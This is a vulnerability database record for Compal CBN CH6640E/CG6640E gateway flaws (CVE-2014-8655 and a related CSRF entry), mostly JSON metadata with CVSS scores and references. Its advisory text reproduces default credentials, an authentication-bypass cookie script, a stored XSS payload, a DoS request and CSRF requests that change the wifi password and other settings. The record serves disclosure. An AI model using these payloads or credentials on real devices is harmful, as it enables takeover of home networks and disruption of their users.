9 vulnerabilities by compal
VAR-201411-0178
Vulnerability from variot - Updated: 2025-04-13 23:14
The Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH allows remote attackers to bypass authentication and obtain sensitive information via an (a) admin or a (b) root value in the userData cookie in a request to (1) CmgwWirelessSecurity.xml, (2) DocsisConfigFile.xml, or (3) CmgwBasicSetup.xml in xml/ or (4) basicDDNS.html, (5) basicLanUsers.html, or (6) rootDesc.xml. That is, the role is taken from a cookie value the client itself supplies. The affected resources are (1) xml/CmgwWirelessSecurity.xml, (2) xml/DocsisConfigFile.xml, (3) xml/CmgwBasicSetup.xml, (4) basicDDNS.html, (5) basicLanUsers.html, and (6) rootDesc.xml. The CBN CH6640E and CG6640E are wireless gateway devices. They have multiple security vulnerabilities that allow an attacker to bypass authorization and access sensitive information, and to perform cross-site scripting, cross-site request forgery, and denial-of-service attacks. Cg6640e Wireless Gateway is prone to an information disclosure vulnerability.
Product web page: http://www.icbn.com.tw
Affected version:
Model: CH6640 and CH6640E
Hardware version: 1.0
Firmware version: CH6640-3.5.11.7-NOSH
Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01
DOCSIS mode: DOCSIS 3.0
Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home, home office, or small business/enterprise. It can be used in households with one or more computers capable of wireless connectivity for remote access to the wireless gateway.
Default credentials:
admin/admin - Allows access to gateway pages.
root/compalbn - Allows access to gateway and provisioning pages, and provides more configuration information.
--
document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";--
Denial of Service (DoS) for all WiFi connected clients (disconnect)
GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1
Stored Cross-Site Scripting (XSS) Vulnerability
Cookie: userData Value: hax0r">alert(document.cookie);
--
document.cookie="hax0r">alert(document.cookie);; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";--
Cross-Site Request Forgery (CSRF) Vulnerability
DDNS config:
GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1
Change wifi pass:
GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1
Add static mac address (static assigned dhcp client):
GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1
Enable/Disable UPnP:
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable) GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201411-0178",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "cg6640e wireless gateway",
"scope": "eq",
"trust": 1.8,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "",
"scope": "eq",
"trust": 1.6,
"vendor": "compal broadband",
"version": "ch6640-3.5.11.7-nosh"
},
{
"model": "ch664oe wireless gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "ch6640e wireless gateway",
"scope": "eq",
"trust": 0.8,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "networks",
"scope": "eq",
"trust": 0.8,
"vendor": "compal broadband",
"version": "ch6640-3.5.11.7-nosh"
},
{
"model": "broadband networks inc cg6640e wireless gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "compal",
"version": "1.0"
},
{
"model": "broadband networks inc ch6640e wireless gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "compal",
"version": "1.0"
},
{
"model": "broadband networks ch6640-3.5.11.7-nosh",
"scope": null,
"trust": 0.3,
"vendor": "compal",
"version": null
},
{
"model": "broadband networks ch664oe wireless gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "compal",
"version": "1.0"
},
{
"model": "broadband networks cg6640e wireless gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "compal",
"version": "1.0"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "model: ch6640 and ch6640e"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "hardware version: 1.0"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "firmware version: ch6640-3.5.11.7-nosh"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "boot version: pspu-boot(bbu) 1.0.19.25m1-cbn01"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "docsis mode: docsis 3.0"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "BID",
"id": "77769"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005242"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-190"
},
{
"db": "NVD",
"id": "CVE-2014-8655"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:compal_broadband_networks:cg6640e_wireless_gateway",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:compal_broadband_networks:ch664oe_wireless_gateway",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:compal_broadband_networks:firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005242"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "77769"
}
],
"trust": 0.3
},
"cve": "CVE-2014-8655",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2014-8655",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2014-07893",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-76600",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-8655",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2014-8655",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2014-07893",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201411-190",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "ZSL",
"id": "ZSL-2014-5203",
"trust": 0.1,
"value": "(3/5)"
},
{
"author": "VULHUB",
"id": "VHN-76600",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76600"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005242"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-190"
},
{
"db": "NVD",
"id": "CVE-2014-8655"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH allows remote attackers to bypass authentication and obtain sensitive information via an (a) admin or a (b) root value in the userData cookie in a request to (1) CmgwWirelessSecurity.xml, (2) DocsisConfigFile.xml, or (3) CmgwBasicSetup.xml in xml/ or (4) basicDDNS.html, (5) basicLanUsers.html, or (6) rootDesc.xml. (1) xml/ of CmgwWirelessSecurity.xml (2) xml/ of DocsisConfigFile.xml (3) xml/ of CmgwBasicSetup.xml (4) basicDDNS.html (5) basicLanUsers.html (6) rootDesc.xml. The CBN CH6640E and CG6640E are wireless gateway devices. CBN CH6640E and CG6640E have multiple security vulnerabilities that allow an attacker to exploit vulnerabilities to bypass authorized access to sensitive information, perform cross-site scripting, cross-site request forgery, and denial of service attacks. Cg6640e Wireless Gateway is prone to a information disclosure vulnerability. \nProduct web page: http://www.icbn.com.tw\nAffected version: Model: CH6640 and CH6640E\n Hardware version: 1.0\n Firmware version: CH6640-3.5.11.7-NOSH\n Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01\n DOCSIS mode: DOCSIS 3.0\n\n\nSummary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,\nhome office, or small business/enterprise. It can be used in households with\none or more computers capable of wireless connectivity for remote access to\nthe wireless gateway. \n\nDefault credentials:\n\nadmin/admin - Allow access gateway pages\nroot/compalbn - Allow access gateway, provisioning pages and provide more\n configuration information. 
\n\n--\n\u003chtml\u003e\n\u003cbody\u003e\n\u003cscript\u003e\ndocument.cookie=\"userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n--\n\n\nDenial of Service (DoS) for all WiFi connected clients (disconnect)\n###################################################################\n\nGET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1\n\n\nStored Cross-Site Scripting (XSS) Vulnerability\n###############################################\n\nCookie: userData\nValue: hax0r\"\u003e\u003cscript\u003ealert(document.cookie);\u003c/script\u003e\n\n--\n\u003chtml\u003e\n\u003cbody\u003e\n\u003cscript\u003e\ndocument.cookie=\"hax0r\"\u003e\u003cscript\u003ealert(document.cookie);\u003c/script\u003e; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n--\n\n\nCross-Site Request Forgery (CSRF) Vulnerability\n###############################################\n\nDDNS config:\n------------\n\nGET http://192.168.0.1/basicDDNS.html?DdnsService=1\u0026DdnsUserName=a\u0026DdnsPassword=b\u0026DdnsHostName=c# HTTP/1.1\n\n\nChange wifi pass:\n-----------------\n\nGET http://192.168.0.1/setWirelessSecurity.html?Ssid=0\u0026sMode=7\u0026sbMode=1\u0026encAlgm=3\u0026psKey=NEW_PASSWORD\u0026rekeyInt=0 HTTP/1.1\n\n\nAdd static mac address (static assigned dhcp client):\n-----------------------------------------------------\n\nGET http://192.168.0.1/setBasicDHCP1.html?action=add_static\u0026MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF\u0026LeasedIP=8 HTTP/1.1\n\n\nEnable/Disable UPnP:\n--------------------\n\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply\u0026instance=undefined\u0026UPnP=1 HTTP/1.1 (enable)\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply\u0026instance=undefined\u0026UPnP=2 HTTP/1.1 (disable)\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-8655"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005242"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "BID",
"id": "77769"
},
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "VULHUB",
"id": "VHN-76600"
},
{
"db": "PACKETSTORM",
"id": "128860"
}
],
"trust": 2.7
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.zeroscience.mk/codes/cbn_mv.txt",
"trust": 0.1,
"type": "poc"
},
{
"reference": "https://www.scap.org.cn/vuln/vhn-76600",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "VULHUB",
"id": "VHN-76600"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-8655",
"trust": 3.5
},
{
"db": "EXPLOIT-DB",
"id": "35075",
"trust": 2.9
},
{
"db": "BID",
"id": "70762",
"trust": 2.7
},
{
"db": "PACKETSTORM",
"id": "128860",
"trust": 1.9
},
{
"db": "OSVDB",
"id": "113837",
"trust": 1.8
},
{
"db": "XF",
"id": "98331",
"trust": 0.9
},
{
"db": "ZSL",
"id": "ZSL-2014-5203",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005242",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201411-190",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2014-07893",
"trust": 0.6
},
{
"db": "BID",
"id": "77769",
"trust": 0.4
},
{
"db": "XF",
"id": "98328",
"trust": 0.1
},
{
"db": "XF",
"id": "98329",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113843",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113838",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113836",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113842",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113841",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113840",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113839",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2014100162",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-87381",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-76600",
"trust": 0.1
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76600"
},
{
"db": "BID",
"id": "77769"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005242"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-190"
},
{
"db": "NVD",
"id": "CVE-2014-8655"
}
]
},
"id": "VAR-201411-0178",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76600"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-07893"
}
]
},
"last_update_date": "2025-04-13T23:14:41.576000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.icbn.com.tw/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005242"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-76600"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005242"
},
{
"db": "NVD",
"id": "CVE-2014-8655"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.1,
"url": "http://www.securityfocus.com/bid/70762"
},
{
"trust": 2.0,
"url": "http://www.exploit-db.com/exploits/35075"
},
{
"trust": 1.8,
"url": "http://osvdb.org/show/osvdb/113837"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/128860/cbn-ch6640e-cg6640e-wireless-gateway-xss-csrf-dos-disclosure.html"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98331"
},
{
"trust": 0.9,
"url": "http://www.exploit-db.com/exploits/35075/"
},
{
"trust": 0.9,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8655"
},
{
"trust": 0.9,
"url": "http://xforce.iss.net/xforce/xfdb/98331"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8655"
},
{
"trust": 0.7,
"url": "http://www.zeroscience.mk/en/vulnerabilities/zsl-2014-5203.php"
},
{
"trust": 0.1,
"url": "http://cxsecurity.com/issue/wlb-2014100162"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113836"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113838"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113839"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113840"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113841"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113842"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113843"
},
{
"trust": 0.1,
"url": "http://packetstormsecurity.com/files/128860"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/xforce/xfdb/98328"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/xforce/xfdb/98329"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8653"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8654"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8655"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8656"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8657"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8653"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8654"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8656"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8657"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basiclanusers.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/docsisconfigfile.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/cmgwbasicsetup.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setwirelesssecurity.html?ssid=0\u0026smode=7\u0026sbmode=1\u0026encalgm=3\u0026pskey=new_password\u0026rekeyint=0"
},
{
"trust": 0.1,
"url": "http://192.168.0.1:5000/rootdesc.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basicddns.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setadvancedoptions.html?action=apply\u0026instance=undefined\u0026upnp=1"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/cmgwwirelesssecurity.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/wirelesschannelstatus.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setbasicdhcp1.html?action=add_static\u0026macaddress=38%3a59%3af9%3ac3%3ae3%3aef\u0026leasedip=8"
},
{
"trust": 0.1,
"url": "http://www.icbn.com.tw"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basicddns.html?ddnsservice=1\u0026ddnsusername=a\u0026ddnspassword=b\u0026ddnshostname=c#"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setadvancedoptions.html?action=apply\u0026instance=undefined\u0026upnp=2"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76600"
},
{
"db": "BID",
"id": "77769"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005242"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-190"
},
{
"db": "NVD",
"id": "CVE-2014-8655"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76600"
},
{
"db": "BID",
"id": "77769"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005242"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-190"
},
{
"db": "NVD",
"id": "CVE-2014-8655"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-10-25T00:00:00",
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"date": "2014-11-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"date": "2014-11-06T00:00:00",
"db": "VULHUB",
"id": "VHN-76600"
},
{
"date": "2014-11-06T00:00:00",
"db": "BID",
"id": "77769"
},
{
"date": "2014-11-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005242"
},
{
"date": "2014-10-28T00:59:24",
"db": "PACKETSTORM",
"id": "128860"
},
{
"date": "2014-11-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201411-190"
},
{
"date": "2014-11-06T15:55:10.850000",
"db": "NVD",
"id": "CVE-2014-8655"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-11-07T00:00:00",
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"date": "2014-11-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"date": "2017-09-08T00:00:00",
"db": "VULHUB",
"id": "VHN-76600"
},
{
"date": "2014-11-06T00:00:00",
"db": "BID",
"id": "77769"
},
{
"date": "2014-11-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005242"
},
{
"date": "2014-11-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201411-190"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2014-8655"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201411-190"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Compal Broadband Networks of CH6640E and CG6640E Wireless Gateway Vulnerabilities that can bypass authentication in some firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005242"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201411-190"
}
],
"trust": 0.6
}
}
VAR-201411-0177
Vulnerability from variot - Updated: 2025-04-13 23:14
Multiple cross-site request forgery (CSRF) vulnerabilities in Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway hardware 1.0 with firmware CH6640-3.5.11.7-NOSH allow remote attackers to hijack the authentication of administrators for requests that (1) have unspecified impact on DDNS configuration via a request to basicDDNS.html, (2) change the wifi password via the psKey parameter to setWirelessSecurity.html, (3) add a static MAC address via the MacAddress parameter in an add_static action to setBasicDHCP1.html, or (4) enable or disable UPnP via the UPnP parameter in an apply action to setAdvancedOptions.html. In other words: (2) the wifi password is changed via the psKey parameter of setWirelessSecurity.html; (3) a static MAC address is added via the MacAddress parameter in the add_static action of setBasicDHCP1.html; (4) UPnP is enabled or disabled via the UPnP parameter in the apply action of setAdvancedOptions.html. The CBN CH6640E and CG6640E are wireless gateway devices. They have multiple security vulnerabilities that allow an attacker to bypass authorization and access sensitive information, and to perform cross-site scripting, cross-site request forgery, and denial-of-service attacks. Ch664oe Wireless Gateway is prone to a cross-site request forgery vulnerability. An attacker can exploit this vulnerability through the 'UPnP' parameter in the apply action of the HTML page to enable or disable UPnP.
Product web page: http://www.icbn.com.tw
Affected version:
Model: CH6640 and CH6640E
Hardware version: 1.0
Firmware version: CH6640-3.5.11.7-NOSH
Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01
DOCSIS mode: DOCSIS 3.0
Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home, home office, or small business/enterprise. It can be used in households with one or more computers capable of wireless connectivity for remote access to the wireless gateway.
Default credentials:
admin/admin - Allows access to gateway pages.
root/compalbn - Allows access to gateway and provisioning pages, and provides more configuration information.
Tested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7
